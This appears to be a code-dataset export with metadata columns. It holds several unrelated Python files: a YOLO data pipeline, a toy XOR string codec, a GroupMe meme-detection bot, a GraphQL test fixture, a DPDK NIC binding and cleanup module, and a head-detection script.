box_wh = tf.tile(tf.expand_dims(box_wh, -2),
(1, 1, tf.shape(anchors)[0], 1))
box_area = box_wh[..., 0] * box_wh[..., 1]
intersection = tf.minimum(box_wh[..., 0], anchors[..., 0]) * \
tf.minimum(box_wh[..., 1], anchors[..., 1])
iou = intersection / (box_area + anchor_area - intersection)
anchor_idx = tf.cast(tf.argmax(iou, axis=-1), tf.float32)
anchor_idx = tf.expand_dims(anchor_idx, axis=-1)
y_train = tf.concat([y_train, anchor_idx], axis=-1)
for anchor_idxs in anchor_masks:
y_outs.append(transform_targets_for_output(
y_train, grid_size, anchor_idxs))
grid_size *= 2
return tuple(y_outs)
def transform_images(x_train, size):
x_train = tf.image.resize(x_train, (size, size))
x_train = x_train / 255
return x_train
def parse_yolo_dataset(line, image_path):
line = tf.strings.split(line, ',')
image_file = tf.strings.reduce_join([image_path, line[0]], separator='/')
bbx = tf.strings.to_number(tf.strings.split(line[1:], ' '), out_type=tf.float32)
y = bbx.to_tensor()
paddings = [[0, FLAGS.yolo_max_boxes - tf.shape(y)[0]], [0, 0]]
y = tf.pad(y, paddings)
return image_file, y
def parse_yolo_image(image, label, size):
image = tf.io.read_file(image)
image = tf.io.decode_image(image, channels=3, expand_animations=False)
image = tf.image.resize(image, (size, size))
return image, label
def load_yolo_dataset(image_path, label_file, size=416, shuffle=False, shuffle_buffer_size=512):
    """Build a tf.data pipeline of (image, padded boxes) pairs from a label file."""
    ds = tf.data.TextLineDataset(label_file)
    if shuffle:
        ds = ds.shuffle(buffer_size=shuffle_buffer_size)
    # parse each label line, then load/resize the referenced image
    return (ds
            .map(lambda line: parse_yolo_dataset(line, image_path))
            .map(lambda img, y: parse_yolo_image(img, y, size)))
def get_dataset_size(label_file):
    """Return the number of lines (labelled examples) in *label_file*.

    Streams the file so memory use stays constant.  Unlike the previous
    ``enumerate``-and-``pass`` version, an empty file returns 0 instead of
    raising NameError on the unbound loop variable.
    """
    with open(label_file, 'r') as f:
        return sum(1 for _ in f)
| en | 0.393192 | # y_true: (N, boxes, (x1, y1, x2, y2, class, best_anchor)) # y_true_out: (N, grid, grid, anchors, [x, y, w, h, obj, class]) # grid[y][x][anchor] = (tx, ty, bw, bh, obj, class) # tf.print(indexes.stack()) # tf.print(updates.stack()) # calculate anchor index for true boxes | 2.194016 | 2 |
python/code/codec/codec_my.py | knowledgebao/language | 1 | 6613976 | <filename>python/code/codec/codec_my.py
import os
def encrypt(key, s):
    """Obfuscate string *s* into a printable 'A'..'P' string.

    Each GBK byte of ``str(s)`` is XORed with *key* (an int in (0, 256));
    the low and high nibbles of the result are then emitted -- low nibble
    first -- as the characters 'A'..'P'.  Reversible with decrypt() and
    the same key.
    """
    data = bytearray(str(s).encode("gbk"))
    out = bytearray()
    for byte in data:
        masked = byte ^ key
        out.append((masked & 0x0F) + 65)   # low nibble  -> 'A'..'P'
        out.append((masked >> 4) + 65)     # high nibble -> 'A'..'P'
    return out.decode("gbk")
def decrypt(key, s):
    """Invert encrypt(): decode an 'A'..'P' string back to the original text.

    *key* must be the same int in (0, 256) that was used for encrypt().
    Returns "" when *s* has an odd number of bytes, i.e. cannot be a valid
    ciphertext.
    """
    data = bytearray(str(s).encode("gbk"))
    if len(data) % 2 != 0:
        return ""
    plain = bytearray()
    # consume the ciphertext two characters at a time: (low, high) nibbles
    for lo, hi in zip(data[0::2], data[1::2]):
        byte = (hi - 65) * 16 + (lo - 65)  # reassemble the masked byte
        plain.append(byte ^ key)           # undo the XOR mask
    return plain.decode("gbk")
if __name__ == '__main__':
    # Smoke test: round-trip a couple of sample strings through
    # encrypt()/decrypt() and print key, plaintext, ciphertext, decoded.
    key = 123
    s = ['test1', 'test2']
    for i in s:
        e = encrypt(key, i)
        d = decrypt(key, e)
        print(key, i, e, d)
    # Expected output:
    # 123 test1 PAOBIAPAKE test1
# 123 test2 PAOBIAPAJE test2 | <filename>python/code/codec/codec_my.py
import os
def encrypt(key, s):
'''
1.对字符串s进行编码,返回编码后的数据
2.key必须是数字(0,256)
'''
b = bytearray(str(s).encode("gbk"))
n = len(b) # 求出 b 的字节数
c = bytearray(n*2)
j = 0
for i in range(0, n):
b1 = b[i]
b2 = b1 ^ key # b1 = b2^ key
c1 = b2 % 16
c2 = b2 // 16 # b2 = c2*16 + c1
c1 = c1 + 65
c2 = c2 + 65 # c1,c2都是0~15之间的数,加上65就变成了A-P 的字符的编码
c[j] = c1
c[j+1] = c2
j = j+2
return c.decode("gbk")
def decrypt(key, s):
'''
1.对字符串s进行解密
2.key必须是数字(0,256)
'''
c = bytearray(str(s).encode("gbk"))
n = len(c) # 计算 b 的字节数
if n % 2 != 0:
return ""
n = n // 2
b = bytearray(n)
j = 0
for i in range(0, n):
c1 = c[j]
c2 = c[j+1]
j = j+2
c1 = c1 - 65
c2 = c2 - 65
b2 = c2*16 + c1
b1 = b2 ^ key
b[i] = b1
return b.decode("gbk")
if __name__ == '__main__':
key=123
s=['test1','test2']
for i in s:
e = encrypt(key,i)
d = decrypt(key,e)
print(key,i,e,d)
# 123 test1 PAOBIAPAKE test1
# 123 test2 PAOBIAPAJE test2 | zh | 0.759976 | 1.对字符串s进行编码,返回编码后的数据 2.key必须是数字(0,256) # 求出 b 的字节数 # b1 = b2^ key # b2 = c2*16 + c1 # c1,c2都是0~15之间的数,加上65就变成了A-P 的字符的编码 1.对字符串s进行解密 2.key必须是数字(0,256) # 计算 b 的字节数 # 123 test1 PAOBIAPAKE test1 # 123 test2 PAOBIAPAJE test2 | 3.463815 | 3 |
IsThisLossV1/IsThisLossBot.py | Kyekifino/IsThisLoss | 0 | 6613977 | # Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import requests
import IsThisLossHelper as helper
import IsThisLossBotConfig as conf
import time
import os
import IsThisLossV1 as loss
import tensorflow as tf
import numpy as np
import pandas as pd
from PIL import Image
from io import BytesIO
print("Loading bot...")

# Train/load the classifier once at startup; `accuracy` is reported in the
# greeting message below.
classifier, accuracy = loss.getIsThisLossModel()

request_params = conf.request_params()

# Get to the latest message: fetch once and remember the newest message id so
# the polling loop below only processes messages posted after startup.
# (Fixed: the original had a duplicated `response = response = ...` assignment.)
response = requests.get('https://api.groupme.com/v3/groups/' + conf.group_id() + '/messages', params = request_params)
if response.status_code == 200:
    response_messages = response.json()['response']['messages']
    request_params['after_id'] = response_messages[0]['id']
    response = requests.get('https://api.groupme.com/v3/groups/' + conf.group_id() + '/messages', params = request_params)

print("Ready to run!")

intro_text = ("Hey there, my name is IsThisLossBotV1!\n"
              "I\'ll be sure to butt into the conversation if I see a Loss meme!\n"
              "Today I am " + str(100*accuracy) + "% accurate!")
post_params = { 'bot_id' : conf.bot_id(), 'text': intro_text }
requests.post('https://api.groupme.com/v3/bots/post', params = post_params)

# Poll the group once per second; classify every image attachment and reply
# when the model predicts class 1 ("Loss").
while True:
    response = requests.get('https://api.groupme.com/v3/groups/' + conf.group_id() + '/messages', params = request_params)
    if response.status_code == 200:
        response_messages = response.json()['response']['messages']
        for message in response_messages:
            for attachment in message['attachments']:
                if (attachment['type'] == "image"):
                    print(attachment['url'])
                    pic_response = requests.get(attachment['url'])
                    img = Image.open(BytesIO(pic_response.content))
                    # Resize image to 100x100
                    final_size = 100
                    new_image_size = (final_size, final_size)
                    img = img.resize(new_image_size, Image.ANTIALIAS)
                    new_im = Image.new("RGB", (final_size, final_size))
                    new_im.paste(img, (0, 0))
                    img = new_im
                    # Make image grayscale ('LA': luminance + alpha)
                    img = img.convert('LA')
                    # Flatten pixel luminances into one row, with a leading 0
                    # placeholder label column, matching the training layout.
                    pic_array = [[]]
                    width, height = img.size
                    data = img.load()
                    pic_array[0].append(0)
                    for y in range(height):
                        for x in range(width):
                            pic_array[0].append(data[x,y][0])
                    df = pd.DataFrame(data=pic_array)
                    prediction_targets, prediction_examples = helper.parse_labels_and_features(df)
                    predict_input_fn = helper.create_predict_input_fn(
                        prediction_examples, prediction_targets, 1)
                    predictions = list(classifier.predict(input_fn=predict_input_fn))
                    predicted_classes = [p["classes"] for p in predictions]
                    print(predictions)
                    for c in predicted_classes:
                        predicted_class = str(c[0])
                        if predicted_class == "b\'1\'":
                            # Class 1 -> the meme looks like Loss: reply.
                            text = "Is this loss?"
                            print(predicted_class)
                            post_params = { 'bot_id' : conf.bot_id(), 'text': text }
                            requests.post('https://api.groupme.com/v3/bots/post', params = post_params)
                        else:
                            print(predicted_class)
            # Advance the cursor so this message is not processed again.
            request_params['after_id'] = message['id']
    time.sleep(1)
| # Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import requests
import IsThisLossHelper as helper
import IsThisLossBotConfig as conf
import time
import os
import IsThisLossV1 as loss
import tensorflow as tf
import numpy as np
import pandas as pd
from PIL import Image
from io import BytesIO
print("Loading bot...")
classifier, accuracy = loss.getIsThisLossModel()
request_params = conf.request_params()
#Get to the latest message
response = response = requests.get('https://api.groupme.com/v3/groups/' + conf.group_id() + '/messages', params = request_params)
if response.status_code == 200:
response_messages = response.json()['response']['messages']
request_params['after_id'] = response_messages[0]['id']
response = response = requests.get('https://api.groupme.com/v3/groups/' + conf.group_id() + '/messages', params = request_params)
print("Ready to run!")
intro_text = ("Hey there, my name is IsThisLossBotV1!\n"
"I\'ll be sure to butt into the conversation if I see a Loss meme!\n"
"Today I am " + str(100*accuracy) + "% accurate!")
post_params = { 'bot_id' : conf.bot_id(), 'text': intro_text }
requests.post('https://api.groupme.com/v3/bots/post', params = post_params)
while True:
response = requests.get('https://api.groupme.com/v3/groups/' + conf.group_id() + '/messages', params = request_params)
if response.status_code == 200:
response_messages = response.json()['response']['messages']
for message in response_messages:
for attachment in message['attachments']:
if (attachment['type'] == "image"):
print(attachment['url'])
pic_response = requests.get(attachment['url'])
img = Image.open(BytesIO(pic_response.content))
# Resize image to 100x100
final_size = 100
new_image_size = (final_size, final_size)
img = img.resize(new_image_size, Image.ANTIALIAS)
new_im = Image.new("RGB", (final_size, final_size))
new_im.paste(img, (0, 0))
img = new_im
# Make image grayscale
img = img.convert('LA')
# Create array of image info
pic_array = [[]]
width, height = img.size
data = img.load()
pic_array[0].append(0)
for y in range(height):
for x in range(width):
pic_array[0].append(data[x,y][0])
df = pd.DataFrame(data=pic_array)
prediction_targets, prediction_examples = helper.parse_labels_and_features(df)
predict_input_fn = helper.create_predict_input_fn(
prediction_examples, prediction_targets, 1)
predictions = list(classifier.predict(input_fn=predict_input_fn))
predicted_classes = [p["classes"] for p in predictions]
print(predictions)
for c in predicted_classes:
predicted_class = str(c[0])
if predicted_class == "b\'1\'":
text = "Is this loss?"
print(predicted_class)
post_params = { 'bot_id' : conf.bot_id(), 'text': text }
requests.post('https://api.groupme.com/v3/bots/post', params = post_params)
else:
print(predicted_class)
request_params['after_id'] = message['id']
time.sleep(1)
| en | 0.854656 | # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # https://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. #Get to the latest message # Resize image to 100x100 # Make image grayscale # Create array of image info | 2.18015 | 2 |
web-maxiv-tangogql/conftest.py | snehalpersistent/snehalvgithub | 0 | 6613978 | <gh_stars>0
#!/usr/bin/env python3
"""Configuration and commons for tests."""
# build-in modules
# third-party modules
import pytest
from graphene.test import Client
# changes to the path ...
# project modules
from tangogql.schema.tango import tangoschema
# import queries
import asyncio
from graphql.execution.executors.asyncio import AsyncioExecutor
__author__ = "antmil"
__docformat__ = "restructuredtext"
class TangogqlClient(object):
    """Thin wrapper around graphene's test Client bound to the Tango schema."""

    def __init__(self):
        self.client = Client(tangoschema)

    def execute(self, query):
        """Run *query* on the current asyncio event loop and return only
        the "data" part of the GraphQL response."""
        loop = asyncio.get_event_loop()
        r = self.client.execute(query, executor=AsyncioExecutor(loop=loop))
        return r["data"]
@pytest.fixture
def client():
    """Provide a fresh TangogqlClient for each test."""
    return TangogqlClient()
| #!/usr/bin/env python3
"""Configuration and commons for tests."""
# build-in modules
# third-party modules
import pytest
from graphene.test import Client
# changes to the path ...
# project modules
from tangogql.schema.tango import tangoschema
# import queries
import asyncio
from graphql.execution.executors.asyncio import AsyncioExecutor
__author__ = "antmil"
__docformat__ = "restructuredtext"
class TangogqlClient(object):
def __init__(self):
self.client = Client(tangoschema)
def execute(self, query):
loop = asyncio.get_event_loop()
r = self.client.execute(query, executor=AsyncioExecutor(loop=loop))
return r["data"]
@pytest.fixture
def client():
client = TangogqlClient()
return client | en | 0.442001 | #!/usr/bin/env python3 Configuration and commons for tests. # build-in modules # third-party modules # changes to the path ... # project modules # import queries | 1.931562 | 2 |
src/dpdk/dpdk.py | shreyagupta30/vineperf | 9 | 6613979 | # Copyright 2015-2017 Intel Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Automation of system configuration for DPDK use.
Parts of this based on ``tools/dpdk*bind.py`` script from Intel(R)
DPDK.
"""
from sys import platform as _platform
import os
import subprocess
import logging
import glob
from conf import settings as S
from tools import tasks
from tools.module_manager import ModuleManager
_LOGGER = logging.getLogger(__name__)
_DPDK_MODULE_MANAGER = ModuleManager()
# declare global NIC variables only as their content might not be known yet
_NICS = []
_NICS_PCI = []
#
# system management
#
def init():
    """Setup system for DPDK.

    Populates the module-level NIC lists from configuration, then (on
    Linux only) loads the DPDK kernel modules, removes the stock
    vhost-net driver and binds the configured NICs.
    """
    # pylint: disable=global-statement
    global _NICS
    global _NICS_PCI
    _NICS = S.getValue('NICS')
    _NICS_PCI = list(nic['pci'] for nic in _NICS)
    if not _is_linux():
        _LOGGER.error('Not running on a compatible Linux version. Exiting...')
        return
    # Order matters: kernel modules must be loaded before NICs are bound.
    _insert_modules()
    _remove_vhost_net()
    _bind_nics()
def cleanup():
    """Restore the system after DPDK use (reverses init()).

    Unbinds the NICs, unloads the DPDK kernel modules and deletes
    leftover vhost-user sockets.  Only runs on Linux.
    """
    if not _is_linux():
        _LOGGER.error('Not running on a compatible Linux version. Exiting...')
        return
    # Unbind first -- modules cannot be removed while NICs still use them.
    _unbind_nics()
    _remove_modules()
    _vhost_user_cleanup()
#
# basic compatibility test
#
def _is_linux():
"""Check if running on Linux.
Many of the functions in this file rely on features commonly found
only on Linux (i.e. ``/proc`` is not present on FreeBSD). Hence, this
check is important to ensure someone doesn't run this on an incompatible
OS or distro.
"""
return _platform.startswith('linux') and os.path.isdir('/proc')
#
# module management
#
def _insert_modules():
    """Ensure required modules are inserted on system.

    Loads every DPDK kernel module listed in TOOLS['dpdk_modules'].
    """
    _DPDK_MODULE_MANAGER.insert_modules(S.getValue('TOOLS')['dpdk_modules'])
def _remove_modules():
    """Ensure required modules are removed from system.

    Unloads the modules previously inserted via _insert_modules().
    """
    _DPDK_MODULE_MANAGER.remove_modules()
#
# 'vhost-net' module cleanup
#
def _remove_vhost_net():
    """Remove the vhost-net driver and its /dev node.

    Unloads the vhost-net kernel module, then deletes /dev/vhost-net;
    failure to delete the node is logged but not fatal.
    """
    _DPDK_MODULE_MANAGER.remove_module('vhost-net')
    try:
        tasks.run_task(['sudo', 'rm', '-f', '/dev/vhost-net'], _LOGGER,
                       'Removing \'/dev/vhost-net\' directory...', True)
    except subprocess.CalledProcessError:
        _LOGGER.error('Unable to remove directory \'/dev/vhost-net\'.')
#
# Vhost-user cleanup
#
def _vhost_user_cleanup():
    """Remove socket files created by vhost-user tests.

    Deletes every file under TOOLS['ovs_var_tmp'] matching the configured
    VHOST_USER_SOCKS glob.  A failed deletion is logged and the loop moves
    on, so one stuck socket does not abort the rest of the cleanup.
    (Removed a redundant ``continue`` that was the last statement of the
    loop body.)
    """
    for sock in glob.glob(os.path.join(S.getValue('TOOLS')['ovs_var_tmp'],
                                       S.getValue('VHOST_USER_SOCKS'))):
        if os.path.exists(sock):
            try:
                tasks.run_task(['sudo', 'rm', sock],
                               _LOGGER,
                               'Deleting vhost-user socket \'%s\'...' %
                               sock,
                               True)
            except subprocess.CalledProcessError:
                _LOGGER.error('Unable to delete vhost-user socket \'%s\'.',
                              sock)
#
# NIC management
#
def _bind_nics():
    """Bind NICs using the bind tool specified in the configuration.

    Chooses the vfio-pci driver when it appears among the configured DPDK
    modules -- also relaxing /dev/vfio permissions -- otherwise falls back
    to igb_uio.  Supports both driverctl (one call per NIC) and
    dpdk-devbind-style tools (one call for all NICs).
    """
    if not _NICS_PCI:
        _LOGGER.info('NICs are not configured - nothing to bind')
        return
    try:
        _driver = 'igb_uio'
        if 'vfio-pci' in S.getValue('TOOLS')['dpdk_modules']:
            _driver = 'vfio-pci'
            # VFIO needs accessible /dev/vfio nodes for unprivileged use
            tasks.run_task(['sudo', 'chmod', 'a+x', '/dev/vfio'],
                           _LOGGER, 'Setting VFIO permissions .. a+x',
                           True)
            tasks.run_task(['sudo', 'chmod', '-R', '666', '/dev/vfio/'],
                           _LOGGER, 'Setting VFIO permissions .. 0666',
                           True)
        if 'driverctl' in S.getValue('TOOLS')['bind-tool'].lower():
            # driverctl sets a persistent per-device driver override
            for nic in _NICS_PCI:
                tasks.run_task(['sudo', S.getValue('TOOLS')['bind-tool'], '-v',
                                'set-override'] + [nic] + [_driver], _LOGGER,
                               'Binding NIC %s...' % nic, True)
        else:
            tasks.run_task(['sudo', S.getValue('TOOLS')['bind-tool'],
                            '--bind=' + _driver] +
                           _NICS_PCI, _LOGGER,
                           'Binding NICs %s...' % _NICS_PCI,
                           True)
    except subprocess.CalledProcessError:
        _LOGGER.error('Unable to bind NICs %s', str(_NICS_PCI))
def _unbind_nics():
    """Unbind NICs using the bind tool specified in the configuration.

    First detaches every configured NIC from the DPDK driver, then rebinds
    each one to the kernel driver recorded at discovery time.  With
    driverctl no explicit rebind is performed: removing the override
    restores the original driver automatically.
    """
    if not _NICS_PCI:
        _LOGGER.info('NICs are not configured - nothing to unbind')
        return
    try:
        if 'driverctl' in S.getValue('TOOLS')['bind-tool'].lower():
            for nic in _NICS_PCI:
                tasks.run_task(['sudo', S.getValue('TOOLS')['bind-tool'], '-v',
                                'unset-override'] + [nic], _LOGGER,
                               'Binding NIC %s...' % nic, True)
        else:
            tasks.run_task(['sudo', S.getValue('TOOLS')['bind-tool'],
                            '--unbind'] +
                           _NICS_PCI, _LOGGER,
                           'Unbinding NICs %s...' % str(_NICS_PCI),
                           True)
    except subprocess.CalledProcessError:
        _LOGGER.error('Unable to unbind NICs %s', str(_NICS_PCI))
    # Rebind NICs to their original drivers
    # using the Intel DPDK ``dpdk*bind.py`` tool.
    for nic in _NICS:
        try:
            if nic['driver']:
                if 'driverctl' in S.getValue('TOOLS')['bind-tool'].lower():
                    # driverctl restores the driver automatically on unset
                    break
                else:
                    tasks.run_task(['sudo', S.getValue('TOOLS')['bind-tool'],
                                    '--bind',
                                    nic['driver'], nic['pci']],
                                   _LOGGER, 'Binding NIC %s to %s...' %
                                   (nic['pci'], nic['driver']),
                                   True)
        except subprocess.CalledProcessError:
            _LOGGER.error('Unable to bind NIC %s to driver %s',
                          nic['pci'], nic['driver'])
class Dpdk(object):
    """A context manager for the system init/cleanup.

    Entering sets the host up for DPDK (module load, NIC binding); leaving
    always restores the original state, even when the body raised.
    """
    def __enter__(self):
        _LOGGER.info('Setting up DPDK')
        init()
        return self

    def __exit__(self, type_, value, traceback):
        # Returns None, so exceptions from the body are not suppressed.
        _LOGGER.info('Cleaning up DPDK')
        cleanup()
| # Copyright 2015-2017 Intel Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Automation of system configuration for DPDK use.
Parts of this based on ``tools/dpdk*bind.py`` script from Intel(R)
DPDK.
"""
from sys import platform as _platform
import os
import subprocess
import logging
import glob
from conf import settings as S
from tools import tasks
from tools.module_manager import ModuleManager
_LOGGER = logging.getLogger(__name__)
_DPDK_MODULE_MANAGER = ModuleManager()
# declare global NIC variables only as their content might not be known yet
_NICS = []
_NICS_PCI = []
#
# system management
#
def init():
"""Setup system for DPDK.
"""
# pylint: disable=global-statement
global _NICS
global _NICS_PCI
_NICS = S.getValue('NICS')
_NICS_PCI = list(nic['pci'] for nic in _NICS)
if not _is_linux():
_LOGGER.error('Not running on a compatible Linux version. Exiting...')
return
_insert_modules()
_remove_vhost_net()
_bind_nics()
def cleanup():
"""Setup system for DPDK.
"""
if not _is_linux():
_LOGGER.error('Not running on a compatible Linux version. Exiting...')
return
_unbind_nics()
_remove_modules()
_vhost_user_cleanup()
#
# basic compatibility test
#
def _is_linux():
"""Check if running on Linux.
Many of the functions in this file rely on features commonly found
only on Linux (i.e. ``/proc`` is not present on FreeBSD). Hence, this
check is important to ensure someone doesn't run this on an incompatible
OS or distro.
"""
return _platform.startswith('linux') and os.path.isdir('/proc')
#
# module management
#
def _insert_modules():
"""Ensure required modules are inserted on system.
"""
_DPDK_MODULE_MANAGER.insert_modules(S.getValue('TOOLS')['dpdk_modules'])
def _remove_modules():
"""Ensure required modules are removed from system.
"""
_DPDK_MODULE_MANAGER.remove_modules()
#
# 'vhost-net' module cleanup
#
def _remove_vhost_net():
"""Remove vhost-net driver and file.
"""
_DPDK_MODULE_MANAGER.remove_module('vhost-net')
try:
tasks.run_task(['sudo', 'rm', '-f', '/dev/vhost-net'], _LOGGER,
'Removing \'/dev/vhost-net\' directory...', True)
except subprocess.CalledProcessError:
_LOGGER.error('Unable to remove directory \'/dev/vhost-net\'.')
#
# Vhost-user cleanup
#
def _vhost_user_cleanup():
"""Remove files created by vhost-user tests.
"""
for sock in glob.glob(os.path.join(S.getValue('TOOLS')['ovs_var_tmp'],
S.getValue('VHOST_USER_SOCKS'))):
if os.path.exists(sock):
try:
tasks.run_task(['sudo', 'rm', sock],
_LOGGER,
'Deleting vhost-user socket \'%s\'...' %
sock,
True)
except subprocess.CalledProcessError:
_LOGGER.error('Unable to delete vhost-user socket \'%s\'.',
sock)
continue
#
# NIC management
#
def _bind_nics():
"""Bind NICs using the bind tool specified in the configuration.
"""
if not _NICS_PCI:
_LOGGER.info('NICs are not configured - nothing to bind')
return
try:
_driver = 'igb_uio'
if 'vfio-pci' in S.getValue('TOOLS')['dpdk_modules']:
_driver = 'vfio-pci'
tasks.run_task(['sudo', 'chmod', 'a+x', '/dev/vfio'],
_LOGGER, 'Setting VFIO permissions .. a+x',
True)
tasks.run_task(['sudo', 'chmod', '-R', '666', '/dev/vfio/'],
_LOGGER, 'Setting VFIO permissions .. 0666',
True)
if 'driverctl' in S.getValue('TOOLS')['bind-tool'].lower():
for nic in _NICS_PCI:
tasks.run_task(['sudo', S.getValue('TOOLS')['bind-tool'], '-v',
'set-override'] + [nic] + [_driver], _LOGGER,
'Binding NIC %s...' % nic, True)
else:
tasks.run_task(['sudo', S.getValue('TOOLS')['bind-tool'],
'--bind=' + _driver] +
_NICS_PCI, _LOGGER,
'Binding NICs %s...' % _NICS_PCI,
True)
except subprocess.CalledProcessError:
_LOGGER.error('Unable to bind NICs %s', str(_NICS_PCI))
def _unbind_nics():
"""Unbind NICs using the bind tool specified in the configuration.
"""
if not _NICS_PCI:
_LOGGER.info('NICs are not configured - nothing to unbind')
return
try:
if 'driverctl' in S.getValue('TOOLS')['bind-tool'].lower():
for nic in _NICS_PCI:
tasks.run_task(['sudo', S.getValue('TOOLS')['bind-tool'], '-v',
'unset-override'] + [nic], _LOGGER,
'Binding NIC %s...' % nic, True)
else:
tasks.run_task(['sudo', S.getValue('TOOLS')['bind-tool'],
'--unbind'] +
_NICS_PCI, _LOGGER,
'Unbinding NICs %s...' % str(_NICS_PCI),
True)
except subprocess.CalledProcessError:
_LOGGER.error('Unable to unbind NICs %s', str(_NICS_PCI))
# Rebind NICs to their original drivers
# using the Intel DPDK ``dpdk*bind.py`` tool.
for nic in _NICS:
try:
if nic['driver']:
if 'driverctl' in S.getValue('TOOLS')['bind-tool'].lower():
# driverctl restores the driver automatically on unset
break
else:
tasks.run_task(['sudo', S.getValue('TOOLS')['bind-tool'],
'--bind',
nic['driver'], nic['pci']],
_LOGGER, 'Binding NIC %s to %s...' %
(nic['pci'], nic['driver']),
True)
except subprocess.CalledProcessError:
_LOGGER.error('Unable to bind NIC %s to driver %s',
nic['pci'], nic['driver'])
class Dpdk(object):
"""A context manager for the system init/cleanup.
"""
def __enter__(self):
_LOGGER.info('Setting up DPDK')
init()
return self
def __exit__(self, type_, value, traceback):
_LOGGER.info('Cleaning up DPDK')
cleanup()
| en | 0.824879 | # Copyright 2015-2017 Intel Corporation. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Automation of system configuration for DPDK use. Parts of this based on ``tools/dpdk*bind.py`` script from Intel(R) DPDK. # declare global NIC variables only as their content might not be known yet # # system management # Setup system for DPDK. # pylint: disable=global-statement Setup system for DPDK. # # basic compatibility test # Check if running on Linux. Many of the functions in this file rely on features commonly found only on Linux (i.e. ``/proc`` is not present on FreeBSD). Hence, this check is important to ensure someone doesn't run this on an incompatible OS or distro. # # module management # Ensure required modules are inserted on system. Ensure required modules are removed from system. # # 'vhost-net' module cleanup # Remove vhost-net driver and file. # # Vhost-user cleanup # Remove files created by vhost-user tests. # # NIC management # Bind NICs using the bind tool specified in the configuration. Unbind NICs using the bind tool specified in the configuration. # Rebind NICs to their original drivers # using the Intel DPDK ``dpdk*bind.py`` tool. # driverctl restores the driver automatically on unset A context manager for the system init/cleanup. | 1.968958 | 2 |
head_detection/main.py | Tiago-Roxo/YinYang-Net | 2 | 6613980 | <reponame>Tiago-Roxo/YinYang-Net
"""
@author: <NAME>, UBI
@date: 2021
"""
import argparse
import sys
import os
sys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
from utils.argparser import *
from draw_keypoints import *
from os import listdir
from os.path import isfile, join
from tqdm import tqdm
import os
from utils.head_detect_config import OUTPUT_DIR
def parse_arguments():
    """Parse command-line arguments; enables the --help functionality.

    Flag names, defaults and help strings come from the utils.argparser
    constants (INPUT*, METHOD*, DRAWING_DIR_EXTENDED).

    @Returns: the parsed argparse.Namespace holding the given parameters
    """
    parser = argparse.ArgumentParser()
    parser.add_argument(INPUT, INPUT_EXTENDED, default=INPUT_DEFAULT, help=INPUT_HELP)
    parser.add_argument(METHOD, METHOD_EXTENDED, default=METHOD_DEFAULT, help=METHOD_HELP)
    parser.add_argument(DRAWING_DIR_EXTENDED)
    args = parser.parse_args()
    return args
if __name__ == "__main__":
    args = parse_arguments()

    # Every plain file in the image directory, processed in sorted order.
    list_imgs = [f for f in listdir(args.img_dir) if isfile(join(args.img_dir, f))]
    list_imgs.sort()

    os.makedirs(OUTPUT_DIR, exist_ok=True)

    # Per-method output folders: keypoint drawings and head crops.
    # (Removed dead `= None` pre-assignments and a no-op `img_id = img_id`.)
    output_dir = os.path.join(OUTPUT_DIR, args.method + "/draw")
    output_dir_crop = os.path.join(OUTPUT_DIR, args.method + "/crop")
    os.makedirs(output_dir, exist_ok=True)
    os.makedirs(output_dir_crop, exist_ok=True)

    json_kp_path = args.input
    method_name = args.method

    for img_id in tqdm(list_imgs):
        draw_keypoints_img(json_kp_path, method_name, img_id, output_dir,
                           output_dir_crop, args.img_dir)
| """
@author: <NAME>, UBI
@date: 2021
"""
import argparse
import sys
import os
sys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
from utils.argparser import *
from draw_keypoints import *
from os import listdir
from os.path import isfile, join
from tqdm import tqdm
import os
from utils.head_detect_config import OUTPUT_DIR
def parse_arguments():
"""
Parser arguments given. Enables the display of "help" funcionality
@Returns: arguments parsed and stores the parameters given to the python file in appropriate variables
"""
parser = argparse.ArgumentParser()
parser.add_argument(INPUT, INPUT_EXTENDED,default=INPUT_DEFAULT, help=INPUT_HELP)
parser.add_argument(METHOD, METHOD_EXTENDED,default=METHOD_DEFAULT, help=METHOD_HELP)
parser.add_argument(DRAWING_DIR_EXTENDED)
args = parser.parse_args()
return args
if __name__ == "__main__":
args = parse_arguments()
list_imgs = [f for f in listdir(args.img_dir) if isfile(join(args.img_dir, f))]
list_imgs.sort()
